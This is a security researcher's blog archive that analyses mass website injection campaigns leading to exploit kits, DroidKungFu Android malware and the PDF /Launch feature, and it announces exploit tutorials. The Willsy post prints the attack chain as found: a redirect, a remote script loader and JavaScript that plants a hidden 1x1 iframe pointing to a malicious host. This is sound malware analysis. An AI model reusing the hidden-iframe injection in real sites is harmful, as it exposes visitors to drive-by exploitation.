Tuesday, 2 August 2011

1See Mass Injection 22,000 Sites

Again a large number of sites have been attacked in a mass injection attack that appears to lead to a known exploit pack called BestPack. A brief analysis of the attack is shown below. As with previous attacks, a Google search for the injected domain lists the affected sites; at the time of analysis it returned approximately 22,000 results.

Google search results


The script tags are injected after the title in a manner identical to the injection attacks shown earlier. The script leads to obfuscated JavaScript consisting of a number of function calls that generate iframes pointing at another remote site.


Injected script tags

First Layer of Obfuscated Javascript

Deobfuscated Javascript 

  
2nd Stage Javascript
The next-stage JavaScript attempts to connect to hxxp://www.susxxxxxin.bz.cm/kent/enter.php. The returned page includes HTML <img> tags such as <img src="18.png" alt="long string of ^-separated numbers">. The JavaScript shown above then uses DOM functions to obtain the img element and its src value, which is assigned to a variable so that it equals "hxxp://www.susxxxxxin.bz.cm/kent/18.png". The script then substrings this to derive a second variable equal to "18" (the file name of the PNG image without its extension) and uses that value as the key to deobfuscate the long alt string in a for loop. The result is stored in a variable named "resalt".

The resalt value is an encoded string that is unescaped and eval'ed to produce the exploit page from the BestPack exploit kit, which targets numerous vulnerabilities and is very similar to the exploit code in the previous post. The deobfuscated resalt value is shown below; this is the final-stage code that exploits the visitor.


Android Analysis - Droid Kung Fu

For a number of months now, the threat of mobile malware has been shifting from limited occurrences to full-scale mass infections across the Android Market. One of the most pervasive families is known as "DroidKungFu". This malware has appeared in numerous game packages published under various malicious accounts. This post details one such application and looks at what makes up such an attack.

Analysis of Android malware is similar to that of Java malware. Android applications run on the Dalvik VM, which is similar to the JVM. Application code is compiled into a .DEX (Dalvik Executable) file, which plays the role of the class files in a Java application. A complete application is distributed as an APK file, an archive (like a JAR) containing the DEX file together with the manifest and the other resources the application needs to run. As with Java, there are various tools to unpack the archive and disassemble the DEX file to Dalvik bytecode or decompile it to Java source code, which makes analysis straightforward. The remainder of the post details the analysis of a sample obtained from Contagio.

Unpacking the Archive
The APK file is essentially a ZIP archive that can be unpacked with WinRAR or 7-Zip. The resulting folders are in the directory structure that Android requires.

The manifest, AndroidManifest.xml, is a binary XML file containing information about the package and its configuration, and it declares the components (activities, services and receivers) within the package that the system may launch. As it is stored in a binary format, it must be decoded to a readable form; AXMLPrinter2.jar outputs it as plain XML. The decoded file is shown below and illustrates the permissions required by the application. A number of unusual permissions are requested, which should raise suspicion.


Now it is possible to reverse the DEX files using a number of techniques. We can use baksmali to disassemble the code to smali, an assembly-like representation of the Dalvik bytecode, which is readable but not as intuitive as Java source code. An example of baksmali output is shown:




In this instance, a number of commands are visible, such as chmod and killall. This portion of code is responsible for setting up the folder structure and staging the exploits. Also visible are a URL and captured phone identifiers such as the IMEI; the URL is a known malicious URL associated with this malware family.

The most effective way to analyse this malware is to convert the DEX code to Java class files and decompile them with a Java decompiler such as JD-GUI. Using dex2jar, available from http://code.google.com/p/dex2jar/, the DEX files within the APK can be converted to Java class files: simply run dex2jar.bat with the APK file as an argument and it will produce a JAR file. JD-GUI can then decompile all of the classes into more readable source code for review. Some of the resulting code is shown below in the screenshots. These areas of code are responsible for the exploitation and data theft that DroidKungFu is known for:
Checking permissions and getting root

Getting root using various exploits based on version
Drop file if not installed


Additional trojan functionality

Wednesday, 27 July 2011

Willsy iFrame Attack on 90,000+ Sites

A large number of sites have been attacked in a mass iframe injection attack that appears to lead to an exploit pack containing numerous exploits for Java, Flash and PDF vulnerabilities. The anatomy of the attack is shown below. A quick Google search returns over 90,000 sites that have been hit.

Upon visiting an affected site, the iframe can be seen injected alongside the title of the index page. When loaded, the remote site returns a 302 response that redirects to another site:

HTTP/1.1 302 Moved Temporarily
Date: Tue, 26 Jul 2011 21:39:47 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Location: http://pa<removed>cky.eu/ext/
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Connection: close
Content-Type: text/html
The redirection then leads to a page containing a single JavaScript element.

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Pafe moved</title>
</head>
<body>
moved
<script type='text/javascript' src='http://ade<removed>rtes.es/images/info/js/js.php'></script>
</body>
</html>
The PHP page contains a single function responsible for loading an iframe. This iframe then leads to another site.

function vdeh() {
    // Wait until the document contains more than three elements before injecting
    if(document.all.length > 3) {
        // Create a 1x1 pixel iframe pointing at the next hop in the chain
        var dch = document.createElement("iframe");
        dch.id = "dchid";
        dch.src = "http://lab<removed>ce.ru/iframe.php?id=0xxnnc3e8793z0nevu1f4o36ncdvg34";
        dch.style.width = "1px";
        dch.style.height = "1px";
        // Attach the hidden iframe to the fourth element in the document
        document.all[3].appendChild(dch);
    } else {
        // Document not far enough along yet: poll again in 500 ms
        setTimeout("vdeh()",500);
    }
} setTimeout("vdeh()",500);
This link then leads to another page containing an iframe:

<iframe src="http://lee<removed>t.ru/forum.php?tp=206614280457fe96" width="1" height="1"></iframe>
This final iframe then loads the code responsible for delivering the exploit JavaScript. This code is heavily obfuscated and consists of a long string of digits in a DIV. The subsequent JavaScript is responsible for deobfuscating the string into JavaScript, which is executed in an eval statement. The obfuscated code is shown below, along with the deobfuscated code. I used Firebug to remove the unnecessary code and reveal the final JavaScript:

Tuesday, 4 May 2010

SEH Exploit Tutorial

Just added a SEH overflow tutorial, over at EthicalHacker.net.

"The intent of this exploit tutorial is to educate the reader on the use and understanding of vulnerabilities and exploit development. This will hopefully enable readers to gain a better understanding of the use of exploitation tools and what goes on underneath to more accurately assess the risk of discovered vulnerabilities in a computer environment. It is important for security consultants and ethical hackers to understand how buffer overflows actually work, as having such knowledge will improve penetration testing capabilities. It will also give you the tools to more accurately assess the risk of vulnerabilities and develop effective countermeasures for exploits doing the rounds in the wild."

Thursday, 1 April 2010

Stack Overflow Video

Just added a new video covering a stack-based remote overflow. The video is essentially a walkthrough of the exploit process documented by Lupin over at Grey-Corner. Check out the Video section.

Stack Overflow Video

The exploit is in the MiniShare web server application. Enjoy.

Mark

PDF Launch Command without javascript

As a result of discussions with the guys over on EthicalHacker.net, I've decided to write briefly about the latest discovery from Didier Stevens: the PDF executable launch feature. Ironically, I used his tools to view the launch objects. In this sample, rather than embedding the objects, it seems he is simply using the /Launch and /Action features of PDF. The real PoC, which is unreleased, embeds objects in a different manner and is more dangerous in my opinion. As a first step, the real PoC also launches cmd.exe, but it then takes four extra steps that ultimately launch an embedded, arbitrary executable.

A similar JavaScript feature is available in Metaphish, but obviously one that doesn't work if JS is disabled. This post is not too in-depth; I just wanted to give you a look at the internals.
For the PDF analysis, I used the excellent PDF-Tools from Didier Stevens, which can be located here. The main Python scripts used were pdf-parser and pdfid, seen below:







With pdfid, we can see that there is an /OpenAction entry, which is traditionally used to execute an action automatically when the document is opened. With further analysis using pdf-parser, we can examine the objects within the document.



Using the search feature, we can look for the /Launch action that Didier talks about. In plain sight, cmd.exe is visible in object 8. Alternatively, we could have searched for "cmd.exe", but we don't know in advance what a malicious file will launch...




A full dump of object 8 with the --object flag provides more detailed information and a breakdown of the /Action format.

All in all, a nice little feature identified by Didier and fairly simple to implement. I expect some examples in the wild soon though :P

Cheers,
Mark

Friday, 26 March 2010

SQLMap, Burpsuite and Mutillidae

Just added a new video section, with a view to creating some video tutorials covering web app security, reversing and malware analysis. The first couple of videos are presented on the videos page. Any suggestions for videos will be considered. I have already posed this question to the people over at EthicalHacker.net.

Video section here

Cheers,
Mark